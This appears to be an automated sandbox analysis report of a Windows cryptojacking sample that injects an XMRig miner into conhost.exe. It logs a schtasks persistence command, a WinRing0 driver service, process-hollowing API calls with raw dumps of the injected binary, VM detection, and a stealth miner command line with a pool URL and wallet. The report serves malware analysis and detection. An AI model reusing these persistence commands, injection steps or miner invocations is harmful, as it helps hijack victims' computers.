cmdline	schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"'

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW Sept. 13, 2021, 9:14 a.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\WR64.sys service_name: WinRing0_1_2_0 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\WR64.sys desired_access: 983551 service_handle: 0x00000000002e3060 error_control: 1 service_type: 1 service_manager_handle: 0x00000000002e2490	1	3027040	0

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe

Network communications indicative of possible code injection originated from the process conhost.exe (11 events)

Time & API	Arguments	Status	Return
connect Sept. 13, 2021, 9:14 a.m.	ip_address: 104.23.99.190 socket: 360 port: 443		-1
send Sept. 13, 2021, 9:14 a.m.	buffer: 51Ï7u=¾Ü ½ñµ·%píÛu£÷úg f¿pÙ §ëèäýU7;Ñ°£9·GüEÂAI>À,À0Ì©Ì¨ÌªÀ+À/À$À(kÀ#À'gÀ À9À À3=<5/ÿªpastebin.com # 0. + -3&$ ð^½aUæ,»À9qïË\~³3ÍP³ socket: 360 sent: 314	1	314
send Sept. 13, 2021, 9:14 a.m.	buffer: EÜ4ÿüB2¸²-®}vCð¹ jÕâ9ØÀãRcG%^´b¥Ìe]J ¶ï)7ô&raÌ±nHÑU\ socket: 360 sent: 80	1	80
send Sept. 13, 2021, 9:14 a.m.	buffer: K×\|#xOß%ñ¨úVFÎùµµùhC®keÅBÙD2%ÐnLcð'?ä}£¡ZK2q¦x¼4ýÚæàGâÂð÷»`ÙìÝü=ÇbOÒ/º{êÝÌø)Z\¿{þVX)ñ[3ÝTfÍAUUòØF®em< socket: 360 sent: 133	1	133
send Sept. 13, 2021, 9:14 a.m.	buffer: Á°îüäÌúHÔî¬¤*»çü socket: 360 sent: 24	1	24
connect Sept. 13, 2021, 9:14 a.m.	ip_address: 185.199.109.133 socket: 380 port: 443		-1
send Sept. 13, 2021, 9:14 a.m.	buffer: B>í V~ZÆ¦+0s«,ìt5²ß÷ñÐã ° á2f;6ÊbÊ.ÔÉ°Í»R¥ÞÌHúÒlZ¶K>À,À0Ì©Ì¨ÌªÀ+À/À$À(kÀ#À'gÀ À9À À3=<5/ÿ·raw.githubusercontent.com # 0. + -3&$ § ?fs^[æo£¼?jöýl¶ÉÃZyc6Ø socket: 380 sent: 327	1	327
send Sept. 13, 2021, 9:14 a.m.	buffer: E)ãÞËa«Ühfz%}RhÎ;%æ¼ùÚfläÒ =¿ÄöØéS*¨Åú.ÎÁ8ëPßgà¨KéH¿.<'Ió socket: 380 sent: 80	1	80
send Sept. 13, 2021, 9:14 a.m.	buffer: ¡¡ÔC§mëýErbr-ÖôÐ\|EÒ5Ëh{23Å¶,"w&ÑÓ:R'qÒäÐGÒÂ ~éF¯çBý? úÌîÇ×Ü4,ª%x`ú!LÓîÒÕeHLì+Ü·]àÝHClæ=Bõ ã5Åó'Ë UÌø7Ê¨¤®Üdï[,å'8Ø³Î socket: 380 sent: 166	1	166
send Sept. 13, 2021, 9:14 a.m.	buffer: ÚG cÏ³ñ¦áoS»æ:ÕMI socket: 380 sent: 24	1	24
WSASend Sept. 13, 2021, 9:14 a.m.	buffer: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s","pass":"","agent":"XMRig/6.12.1 (Windows NT 6.1; Win64; x64) libuv/1.38.0 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","cn/upx2","cn/1","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}} socket: 552		0

Potential code injection by writing to the memory of another process (6 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $\>)éPzéPzéPzCT{éPzCS{éPzCU{ÐéPzIzéPzT{éPzS{éPzU{éPzÞT{ éPzCQ{ éPzéQzpèPzT{KëPzÞY{äéPzÞS{éPzÞ¯zéPzéÇzéPzÞR{éPzRichéPzPEd@+`ð"4Al¶.@u`\|ÐFÜàt°`r\|ðtwCPxC( wC0 4X .textt44 `.rdataÓ 4Ô 4@@.dataðR+G"ÞF@À.pdata\|`rH@@_RANDOMXptJ@`_SHA3_25@ t J@`_TEXT_CNQt &J@`_TEXT_CN°tFJ@`_RDATAÐtXJ@@.rsrc°àtZJ@@.relocðt`J@B base_address: 0x0000000140000000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: HÐ%ÀÿHÁÊ âÀÿffffffffffffffSUWVATAUAVAWHìPót$@ó\|$0óDD$ óDL$óD$HìPóD\$@óDd$0óDl$ óDt$óD<$QHHzHÅHÁè %ÀÿÿIðIÙHÅM3ÀM3ÉM3ÒM3ÛM3äM3íM3öM3ÿHIxfD(AHfD(IXfD(QhfD(YxfD(-fD(5fD(=HÐ%ÀÿHÁÊ âÀÿHì(Ç$ÀÇD$À¿ÇD$ÀßÇD$ÀÿÇD$ ÿÿÿÿëhffffffffffffffffffffffffÀÿÿÿÿÀÿÿÿÿððH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QHÄëfffffffHHL$L3L3IL3QL3YL3a L3i(L3q0L3y8HHL$óæóæIóæQóæYóæa óæi(óæq0óæy8fATåfATífATõfATýfAVæfAVîfAVöfAVþHHL$L3L3IL3QL3YL3a L3i(L3q0L3y8HHL$óæóæIóæQóæYóæa óæi(óæq0óæy8ÈX¢æÐÈP¢îÐÈH¢öÐÈ@¢þÐH3èÕâÀÿÿHÁÍ ÕâÀÿÿHL3L3IL3QL3YL3a L3i(L3q0L3y8HÍHÁé áÀÿÿL3H3èÕâÀÿÿHÁÍ L3LL3TL3\L3d L3l(L3t0L3\|8HìHH\$@LD$8LL$0LT$(L\$ Ld$Ll$Lt$L<$H3èHÁÍ ÝãÀÿÿÁëH\$@L3D$8L3L$0L3T$(L3\$ L3d$L3l$L3t$L3<$HÄHHL$LLILQLYLa Li(Lq0Ly8HL$fWÄfWÍfWÖfWßf)f)If)Q f)Y0ffSUWVATAUAVAWH9HòIèAQ HÝèÞLLNLVL^Lf Ln(Lv0L~8HÅHÆ@H;,$rÈAYA_A^A]A\^_][Ãffffffffffffff@SUWVATAUAVAWHìó$óL$óT$ ó\$0ód$@ól$Pót$`ó\|$póD$óD$óD$ óD$°óD¤$ÀóD¬$ÐóD´$àóD¼$ðH9HòIèAQHì(é-L-ôQXü¡õY FØÂ8ßp§\I"¿¹&b%MIìªÎ¹ï7x-æltV/Nå,¶÷;fffffffffffffffffffffDF@ÀHÝHãÿÿ?HÁãHßHEH%ÿÿ?HÁàHÇH$HEH%ÿÿ?HÁàHÇHD$HEH%ÿÿ?HÁàHÇHD$HEH%ÿÿ?HÁàHÇHD$LEL¯ïþÿÿL ðþÿÿM3ÈLîþÿÿM3ÐLìþÿÿM3ØL%êþÿÿM3àL-èþÿÿM3èL5æþÿÿM3ðL=äþÿÿM3øHl$ Äâ}D$ ÅýÔmþÿÿÄâ} þÿÿÅ½sÐ ÅµsÑ Å}ôÑÅ5ôØÅ½ôÁÄÁ%só Åýsð ÄA-ÔÓÅÔÀÄâ} aþÿÿÅýïÉÄâ}\þÿÿÅýïÒÄâ}WþÿÿÅýïÛÄâ}%RþÿÿÅýïäÄâ}-MþÿÿÅýïíÄâ}5HþÿÿÅýïöÄâ}=CþÿÿÅýïÿÄb}=öýÿÿÄÁ s÷LÅ}lÁLNÅmlËLVÅ]lÕL^ÅMlßLf Å}máLn(ÅmmëLv0Å]mõL~8ÅMmÿÄÃ=FÁ ÄÃ-FË ÅþF@ÅþN`ÄÃFÕ ÄÃ Fß ÅþÅþ ÄÃ=Fá1ÄÃ-Fë1Åþ¦ÀÅþ®àÄÃFõ1ÄÃ Fÿ1Åþ¶Åþ¾ HÅHÆ@H;l$(HÄ(AYóo$óoL$óoT$ óo\$0óod$@óol$Póot$`óo\|$póDo$óDo$óDo$ óDo$°óDo¤$ÀóDo¬$ÐóDo´$àóDo¼$ðÅøwHÄA_A^A]A\^_][ÃHì(H$Å~t$HD$(H\$0HL$8HT$@Å~oÅ~oÅ~oÅ~oÄA=láÄA-lëÄCFõ ÄÁ}ïÆÄCFõ1ÄÁmïÖÄA=máÄA-mëÄCFõ ÄÁuïÎÄCFõ1ÄÁeïÞÅ~o@ Å~oK Å~oQ Å~oZ ÄA=láÄA-lëÄCFõ ÄÁ]ïæÄCFõ1ÄÁMïöÄA=máÄA-mëÄCFõ ÄÁUïîÄCFõ1ÄÁEïþH$Å~ot$HÄ(Åþ$H$H%ÿÿ?HÁàHÇH$HD$H%ÿÿ?HÁàHÇHD$HD$H%ÿÿ?HÁàHÇHD$HD$H%ÿÿ?HÁàHÇHD$HÄ(YLLILQLYLa Li(Lq0Ly8fA@fIPfQ`fYpHI@fa@fiPfq`fypóDo<$óDot$óDol$ óDod$0óDo\$@HÄPóDo$óDoL$óDoD$ óo\|$0óot$@HÄPA_A^A]A\^_][ÃfffffffffffffffffL3L3KL3SL3[L3c L3k(L3s0L3{8Hãÿÿ?HÁãHßfffffffLCHãÿÿ?HÁãHßL¯cL dM3ÈLbM3ÐL`M3ØL%^M3àL-\M3èL5ZM3ðL=XM3øéXffffffff-L-ôQXü¡õY FØÂ8ßp§\I"¿¹&b%MIìªÎ¹ï7x-æltV*/Nå,¶÷;ºLÁ3ÀH½ÉHÓâI÷ðÃ base_address: 0x0000000140747000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: ÅøwH\$Ht$H\|$UATAUAVAWHìPót$@ó\|$0óDD$ óDL$óD$HìPóD\$@óDd$0óDl$ óDt$óD<$Hì@Hl$@HåàÅùïÀ3ÿÇELâÇE LòÇE IÁîAäÇEMèÆE HñßÅýE ÅýE@ÅýE`ÅýÅý ÅýÀÅýàMöt>¶DHM HÁHH1L{Hûu HM èñHûHÇIEÇHÆHØIîuÂH×MätLÇ¶2HÿÂÄâ¹÷ÈHùIÀI;Ôrè¶DHU HÂ¹JåÄâù÷ÉH3 ¸HÁà?H3ÏH H1EhHM èxÅüE ÄÁ\|EÅøwHÄ@óDo<$óDot$óDol$ óDod$0óDo\$@HÄPóDo$óDoL$óDoD$ óo\|$0óot$@HÄPA_A^A]A\]H\$Ht$H\|$ÃLL ÖL/¸HI`Äâ}YA ÅþoI¨ÅþoQÈÅþoYèÅþoaÅþoi(ÅþoqHfÅ}pêNÅUïãÅ]ïÎÅïáÄAïáÄCýÜÅïêÄÃýýNÄÁ=sÔ?ÄAÔÌÄA=ëÁÄCýø9ÄA=ïóÄCýöÅïèÅïïÄÁEsÕ?ÄAÔÅÅ=ëÇÄÁmïÖÄÁ}ïÆÄCøÀÄC%ÝÄAïûÄBíGP ÄÂíEQ ÄÁmëÒÄÁeïßÄBåGXàÄÂåEYàÄÁeëÛÄÁ]ïçÄBÝG ÄÂÝE!ÄÁ]ëäÄÁUïïÄBÕGh ÄÂÕEi ÄÁUëíÄÁMï÷ÄcýÒÄcýÛÄBÍGp@ÄBÍEA@ÄA=ëÆÄÁuïÏÄcýäÄcýírÄBõGxÀÄBõEIÀÄA5ëÏÄÁ sØÄÁ=ßþÄÃ5ÝÄC%ùÄÃ-ëÄC5òÄÃeÛ0ÄCü0ÄÃUé0ÄC õ0ÄÃeÜÀÄCýÀÄÃUíÀÄC óÀÄÁeßßÄÁUßîÄÃñÄC-üÄÁeïÚÄÃMò0ÄCû0ÄÁUïìÄÃMóÀÄCùÀÄÁMß÷ÄÁMïõÄÃýàÄc]ø0ÄÃýÈ9ÄãuÈÀÄÁußÏÄÃ%ÔÄCóÄÃmÕ0ÄC ò0ÄÃmÒÀÄC ôÀÄÁmßÖÄÁmïÑÄãýÿÄãýÛÄãýíÄãýörÄÃâÄCõÄÃ]ä0ÄC ñ0ÄÃ]áÀÄC òÀÄÁ]ßæÅýïÇÄÁuïÈÄÁ]ïãÄÁ}ïMR ÿÈ²ýÿÿÄáù~A ÅþI¨ÅþQÈÅþYèÅþaÅþi(ÅþqHÃfffff$)>-8' =7,+=.?$%:6 8>1',+2 base_address: 0x0000000140748000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: Ð0ï0Ñ0ß00 000@0Ø0p0000X0 0À0õ0¢0¢0Ç¢0¢0¤¢0´¢0Ä¢0¢0Ì¢0¨¢0à¢0Ð¢0 ¢0°¢0À¢0¢0è¢0 base_address: 0x000000014074d000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: 8Ph àt0ãt}4VS_VERSION_INFO½ïþ?êStringFileInfoÆ000004b0<CompanyNamewww.xmrig.com@FileDescriptionXMRig miner.FileVersion6.12.1h"LegalCopyrightCopyright (C) 2016-2021 xmrig.com< OriginalFilenamexmrig.exe,ProductNameXMRig2ProductVersion6.12.1DVarFileInfo$Translation°<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x000000014074e000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: @ base_address: 0x000007fffffd4010 process_identifier: 2392 process_handle: 0x0000000000000484	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $\>)éPzéPzéPzCT{éPzCS{éPzCU{ÐéPzIzéPzT{éPzS{éPzU{éPzÞT{ éPzCQ{ éPzéQzpèPzT{KëPzÞY{äéPzÞS{éPzÞ¯zéPzéÇzéPzÞR{éPzRichéPzPEd@+`ð"4Al¶.@u`\|ÐFÜàt°`r\|ðtwCPxC( wC0 4X .textt44 `.rdataÓ 4Ô 4@@.dataðR+G"ÞF@À.pdata\|`rH@@_RANDOMXptJ@`_SHA3_25@ t J@`_TEXT_CNQt &J@`_TEXT_CN°tFJ@`_RDATAÐtXJ@@.rsrc°àtZJ@@.relocðt`J@B base_address: 0x0000000140000000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2136 called NtSetContextThread to modify thread in remote process 2392
NtSetContextThread Sept. 13, 2021, 9:14 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5371770476 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1506776 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 2006107392 registers.rdx: 8796092841984 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x0000000000000480 process_identifier: 2392	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2136 resumed a thread in remote process 2392
NtResumeThread Sept. 13, 2021, 9:14 a.m.	thread_handle: 0x0000000000000480 suspend_count: 1 process_identifier: 2392	1	0	0

Created a process named as a common system process (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 13, 2021, 9:13 a.m.	thread_identifier: 1172 thread_handle: 0x0000000000000428 process_identifier: 2136 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\Services.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\Services.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\Services.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000450	1	1	0
ShellExecuteExW Sept. 13, 2021, 9:13 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\Services.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\Services.exe	1	1	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Sept. 13, 2021, 9:14 a.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

Executed a process and injected code into it, probably while unpacking (50 out of 61 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 13, 2021, 9:12 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2752	1	0
NtResumeThread Sept. 13, 2021, 9:12 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 2752	1	0
NtResumeThread Sept. 13, 2021, 9:12 a.m.	thread_handle: 0x0000000000000174 suspend_count: 1 process_identifier: 2752	1	0
NtResumeThread Sept. 13, 2021, 9:12 a.m.	thread_handle: 0x00000000000001f8 suspend_count: 1 process_identifier: 2752	1	0
NtResumeThread Sept. 13, 2021, 9:12 a.m.	thread_handle: 0x000000000000022c suspend_count: 1 process_identifier: 2752	1	0
CreateProcessInternalW Sept. 13, 2021, 9:13 a.m.	thread_identifier: 2220 thread_handle: 0x00000000000003d0 process_identifier: 1988 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003c8	1	1
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000001f8 suspend_count: 1 process_identifier: 2752	1	0
CreateProcessInternalW Sept. 13, 2021, 9:13 a.m.	thread_identifier: 2924 thread_handle: 0x000000000000041c process_identifier: 2900 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe" filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000438	1	1
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x0000000000000420 suspend_count: 1 process_identifier: 2752	1	0
CreateProcessInternalW Sept. 13, 2021, 9:13 a.m.	thread_identifier: 1172 thread_handle: 0x0000000000000428 process_identifier: 2136 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\Services.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\Services.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\Services.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000450	1	1
CreateProcessInternalW Sept. 13, 2021, 9:13 a.m.	thread_identifier: 2316 thread_handle: 0x0000000000000060 process_identifier: 2320 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2900	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x000000000000013c suspend_count: 1 process_identifier: 2900	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 2900	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x0000000000000200 suspend_count: 1 process_identifier: 2900	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2136	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 2136	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000001a8 suspend_count: 1 process_identifier: 2136	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000001fc suspend_count: 1 process_identifier: 2136	1	0
NtGetContextThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000000c8	1	0
NtGetContextThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000000c8	1	0
NtGetContextThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000000c8	1	0
NtSetContextThread Sept. 13, 2021, 9:13 a.m.	registers.r14: 5891792 registers.r15: 5891808 registers.rcx: 1728442046 registers.rsi: 5891808 registers.r10: 4294967256 registers.rbx: 40 registers.rsp: 5891632 registers.r11: 45358224 registers.r8: 0 registers.r9: 0 registers.rip: 8791549968032 registers.rdx: 3066240713 registers.r12: 45358672 registers.rbp: 5891824 registers.rdi: 45358984 registers.rax: 40 registers.r13: 5892352 thread_handle: 0x00000000000000c8 process_identifier: 2136	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x00000000000000c8 suspend_count: 1 process_identifier: 2136	1	0
NtResumeThread Sept. 13, 2021, 9:13 a.m.	thread_handle: 0x0000000000000230 suspend_count: 1 process_identifier: 2136	1	0
CreateProcessInternalW Sept. 13, 2021, 9:13 a.m.	thread_identifier: 2088 thread_handle: 0x00000000000003d0 process_identifier: 1948 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003c8	1	1
NtResumeThread Sept. 13, 2021, 9:14 a.m.	thread_handle: 0x0000000000000334 suspend_count: 1 process_identifier: 2136	1	0
CreateProcessInternalW Sept. 13, 2021, 9:14 a.m.	thread_identifier: 2540 thread_handle: 0x000000000000041c process_identifier: 2332 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe" filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000438	1	1
CreateProcessInternalW Sept. 13, 2021, 9:14 a.m.	thread_identifier: 2760 thread_handle: 0x0000000000000480 process_identifier: 2392 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 1 process_handle: 0x0000000000000484	1	1
NtUnmapViewOfSection Sept. 13, 2021, 9:14 a.m.	base_address: 0x0000000140000000 region_size: 8786425282560 process_identifier: 2392 process_handle: 0x0000000000000484		-1073741799
NtAllocateVirtualMemory Sept. 13, 2021, 9:14 a.m.	process_identifier: 2392 region_size: 7700480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000484	1	0
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $\>)éPzéPzéPzCT{éPzCS{éPzCU{ÐéPzIzéPzT{éPzS{éPzU{éPzÞT{ éPzCQ{ éPzéQzpèPzT{KëPzÞY{äéPzÞS{éPzÞ¯zéPzéÇzéPzÞR{éPzRichéPzPEd@+`ð"4Al¶.@u`\|ÐFÜàt°`r\|ðtwCPxC( wC0 4X .textt44 `.rdataÓ 4Ô 4@@.dataðR+G"ÞF@À.pdata\|`rH@@_RANDOMXptJ@`_SHA3_25@ t J@`_TEXT_CNQt &J@`_TEXT_CN°tFJ@`_RDATAÐtXJ@@.rsrc°àtZJ@@.relocðt`J@B base_address: 0x0000000140000000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: base_address: 0x0000000140001000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: base_address: 0x0000000140342000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: base_address: 0x0000000140470000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: base_address: 0x0000000140726000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: HÐ%ÀÿHÁÊ âÀÿffffffffffffffSUWVATAUAVAWHìPót$@ó\|$0óDD$ óDL$óD$HìPóD\$@óDd$0óDl$ óDt$óD<$QHHzHÅHÁè %ÀÿÿIðIÙHÅM3ÀM3ÉM3ÒM3ÛM3äM3íM3öM3ÿHIxfD(AHfD(IXfD(QhfD(YxfD(-fD(5fD(=HÐ%ÀÿHÁÊ âÀÿHì(Ç$ÀÇD$À¿ÇD$ÀßÇD$ÀÿÇD$ ÿÿÿÿëhffffffffffffffffffffffffÀÿÿÿÿÀÿÿÿÿððH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QHÄëfffffffHHL$L3L3IL3QL3YL3a L3i(L3q0L3y8HHL$óæóæIóæQóæYóæa óæi(óæq0óæy8fATåfATífATõfATýfAVæfAVîfAVöfAVþHHL$L3L3IL3QL3YL3a L3i(L3q0L3y8HHL$óæóæIóæQóæYóæa óæi(óæq0óæy8ÈX¢æÐÈP¢îÐÈH¢öÐÈ@¢þÐH3èÕâÀÿÿHÁÍ ÕâÀÿÿHL3L3IL3QL3YL3a L3i(L3q0L3y8HÍHÁé áÀÿÿL3H3èÕâÀÿÿHÁÍ L3LL3TL3\L3d L3l(L3t0L3\|8HìHH\$@LD$8LL$0LT$(L\$ Ld$Ll$Lt$L<$H3èHÁÍ ÝãÀÿÿÁëH\$@L3D$8L3L$0L3T$(L3\$ L3d$L3l$L3t$L3<$HÄHHL$LLILQLYLa Li(Lq0Ly8HL$fWÄfWÍfWÖfWßf)f)If)Q f)Y0ffSUWVATAUAVAWH9HòIèAQ HÝèÞLLNLVL^Lf Ln(Lv0L~8HÅHÆ@H;,$rÈAYA_A^A]A\^_][Ãffffffffffffff@SUWVATAUAVAWHìó$óL$óT$ ó\$0ód$@ól$Pót$`ó\|$póD$óD$óD$ óD$°óD¤$ÀóD¬$ÐóD´$àóD¼$ðH9HòIèAQHì(é-L-ôQXü¡õY 